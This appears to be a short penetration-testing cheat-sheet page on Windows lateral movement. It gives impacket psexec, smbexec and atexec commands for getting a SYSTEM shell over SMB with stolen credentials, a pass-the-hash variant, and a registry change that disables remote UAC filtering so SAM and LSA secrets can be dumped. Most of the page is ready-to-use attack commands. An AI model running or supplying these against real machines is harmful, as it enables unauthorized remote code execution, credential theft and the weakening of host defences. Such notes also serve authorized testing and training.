Need admin privilege on local machine. Will get an NT Authority/System shell if works Use SMB to get shell. If SMB is not opened on the target machine, this is not usable.

impacket-psexec "$user:$pass@$target"

smbexec is useful when the target machine does NOT have a writeable share available. How it works

impacket-smbexec "$user:$pass@$target"

atexec use Task Scheduler service to execute command

impacket-atexec "$user:$pass@$target"

Pass the hash#

impacket-psexec "$user@$target" -hashes ":$hash"

Same for impacket-atexec and impacket-smbexecrust

LocalAccountTokenFilterPolicy#

Use this on machine that does not let you do remote control, this will allow us to get shell via smb on the machine.

Usually I use this to dump sam/lsa easier with impacket-secretsdump.

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 0x1 /f
Backward Enumeration Kerberoasting Forward